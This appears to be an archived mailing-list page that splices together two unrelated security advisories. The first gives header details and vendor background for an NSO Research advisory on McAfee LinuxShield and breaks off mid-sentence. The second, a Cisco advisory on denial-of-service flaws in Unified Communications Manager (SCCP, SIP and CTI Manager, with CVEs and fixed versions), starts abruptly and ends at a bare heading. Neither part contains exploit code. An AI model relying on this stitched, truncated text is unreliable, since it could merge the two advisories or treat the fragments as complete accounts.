  Website:http://sotiriu.de
  Twitter:http://twitter.com/nsoresearch
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2010-004.txt
  Vendor: McAfee (http://www.mcafee.com/)
  Affected Products:  McAfee LinuxShield <= 1.5.1
  Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
  Remote Exploitable: Yes (attacker must be authenticated)
  Local Exploitable:  Yes
  Patch Status:   Vendor released a patch (See Solution)
  Discovered by:  Nikolas Sotiriu
  Thanks to:  Thierry Zoller: For the permission to use his
  Policy


Background:
===

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine - the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server can
harbor these viruses, ready to infect any client that connects to it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially unwanted
software.

LinuxShield scans files as they are opened and closed - a technique
known as on-access scanning. LinuxShield also incorporates an on-demand
scanner that enables you to scan any directory or file in your host at
any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We recommend
that you set up an anti-virus security policy for your network,
incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large n

Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities

2010-03-03 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Unified Communications Manager Denial
of Service Vulnerabilities

Advisory ID: cisco-sa-20100303-cucm

Revision 1.0

For Public Release 2010 March 3 1600 UTC (GMT)

+-

Summary
===

Cisco Unified Communications Manager (formerly Cisco CallManager)
contains multiple denial of service (DoS) vulnerabilities that if
exploited could cause an interruption of voice services. The Session
Initiation Protocol (SIP), Skinny Client Control Protocol (SCCP) and
Computer Telephony Integration (CTI) Manager services are affected by
these vulnerabilities.

To address these vulnerabilities, Cisco has released free software
updates for select Cisco Unified Communications Manager versions.
There is a workaround for one of the vulnerabilities.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20100303-cucm.shtml

Affected Products
=

Vulnerable Products
+--

The following products are affected by vulnerabilities that are
described in this advisory:

  * Cisco Unified Communications Manager 4.x
  * Cisco Unified Communications Manager 5.x
  * Cisco Unified Communications Manager 6.x
  * Cisco Unified Communications Manager 7.x

Note: Cisco Unified Communications Manager version 5.1 reached the
End of Software Maintenance on February 13, 2010. For customers using
Cisco Unified Communications Manager 5.x versions, please contact
your Cisco support team for assistance in upgrading to a supported
version of Cisco Unified Communications Manager.

Products Confirmed Not Vulnerable
+

Cisco Unified Communications Manager version 8.0(1) and Cisco Unified
Communications Manager Express are not affected by these
vulnerabilities. No other Cisco products are currently known to be
affected by these vulnerabilities.

Details
===

Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, VoIP gateways, and multimedia
applications.

Malformed SCCP Message Vulnerabilities
+-

Cisco Unified Communications Manager contains two DoS vulnerabilities
that involve the processing of SCCP packets. Each vulnerability is
triggered by a malformed SCCP message that could cause a critical
process to fail, which could result in the disruption of voice
services. All SCCP ports (TCP ports 2000 and 2443) are affected.

The first SCCP DoS vulnerability is documented in Cisco Bug ID 
CSCtc38985 and has been assigned the CVE identifier CVE-2010-0587.
This vulnerability is fixed in Cisco Unified Communications Manager
versions 4.3(2)SR2, 6.1(5), 7.1(3a)su1 and 8.0(1).

The second SCCP DoS vulnerability is documented in Cisco Bug ID 
CSCtc47823 and has been assigned the CVE identifier CVE-2010-0588.
This vulnerability is fixed in Cisco Unified Communications Manager
versions 6.1(5), 7.1(3a)su1 and 8.0(1). Cisco Unified Communications
Manager 4.x versions are not affected.

Malformed SIP Message Vulnerabilities
+

Cisco Unified Communications Manager contains two DoS vulnerabilities
that involve the processing of SIP messages. Each vulnerability is
triggered by a malformed SIP message that could cause a critical
process to fail, which could result in the disruption of voice
services. All SIP ports (TCP ports 5060 and 5061, UDP ports 5060 and
5061) are affected.

The first SIP DoS vulnerability is documented in Cisco Bug ID 
CSCtc37188 and has been assigned the CVE identifier CVE-2010-0590.
This vulnerability is fixed in Cisco Unified Communications Manager
versions 7.1(3a)su1 and 8.0(1). Cisco Unified Communications Manager
4.x and 6.x versions are not affected.

The second SIP DoS vulnerability is documented in Cisco Bug ID 
CSCtc62362 and has been assigned the CVE identifier CVE-2010-0591.
The second vulnerability is fixed in Cisco Unified Communications Manager
versions 6.1(5), 7.1(3b)SU2 and 8.0(1). Cisco Unified Communications
Manager 4.x versions are not affected.

Malformed CTI Manager Message Vulnerability
+--

The CTI Manager service of Cisco Unified Communications Manager
contains a DoS vulnerability. A malformed message sent to the CTI
Manager service port (TCP 2748) could cause the CTI Manager service
to fail, which could result in the interruption of CTI applications.
The CTI Manager service is disabled by default.

The CTI Manager vulnerability is documented in Cisco Bug ID 
CSCsu31800 and has been assigned the CVE identifier CVE-2010-0592.
This vulnerability is fixed in Cisco Unified Communications Manager
versions 4.3(2)sr1a, 6.1(3), 7.0(2), 7.1(2) and 8.0(1).

Vulnerability Scoring Details